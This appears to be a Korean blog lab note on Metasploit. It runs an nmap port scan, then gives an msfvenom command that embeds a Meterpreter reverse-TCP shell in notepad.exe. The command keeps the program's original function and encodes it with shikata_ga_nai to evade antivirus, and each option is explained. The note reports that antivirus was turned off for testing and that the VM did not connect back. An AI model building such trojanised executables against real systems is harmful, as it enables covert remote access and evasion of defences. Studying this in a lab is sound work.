728x90
반응형
1. 포트 스캔
#msfconsole
msf > db_nmap -sS -Pn -A -p 1-500 x.x.x.x
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.2 -f exe -x /mnt/notepad.exe -k -e x86/shikata_ga_nai -i 3 -o /mnt/notepad_mal.exe
* msfvenom 옵션
a : 타겟 시스템의 아키텍쳐
--platform : 타겟 시스템의 플랫폼 ex) --platform windows
p : 적용할 페이로드 선택
lhost : 상대목표시스템에서 접속할 공격자의 IP주소 입력
f : 만들 파일 포맷을 정한다.
x : 쉘 코드를 넣을 템플릿 파일(악성 코드를 넣을 원본 파일 지정)
k : 원본 파일의 원래 기능을 유지
e : 백신이나 IDS 탐지를 피할 인코더를 선택, 선택한 인코더의 적용 횟수를 -i로 지정
o : 최종으로 만들어질 파일의 경로와 파일명 지정
-> V3에서 탐지되어 차단 -> 테스트를 위해 V3 일시적으로 Off
-> Win7 Vm에 notepad_mal.exe 이동 및 파일 크기 비교
-> 쉘 코드와 인코딩 작업을 한 만큼 파일 크기가 커진 것이며, 작업을 위한 페이로드 작성이 끝난 것이다.
-> exploit 명령을 내린 후 세션 연결을 대기 중인 콘솔 화면
-> Win7 VM에서 실행하였으나 연결안됨
*대상 파일없이 일반 exe로 페이로드를 다시 생성
반응형
'Cyber Security' 카테고리의 다른 글
AT&T 문법과 인텔 문법의 차이 (0) | 2017.06.04 |
---|---|
[Kali Linux] - Samba 3.5.0 - Remote Code Execution (0) | 2017.05.31 |
[Kali Linux] - Virtualbox 공유폴더 마운트 (우분투, Ubuntu 포함) (0) | 2017.05.31 |
Metasploit & Searchsploit 스터디 (0) | 2017.05.31 |
samba 원격 코드 실행 취약점 조치 - samba 4.6.4 install (0) | 2017.05.26 |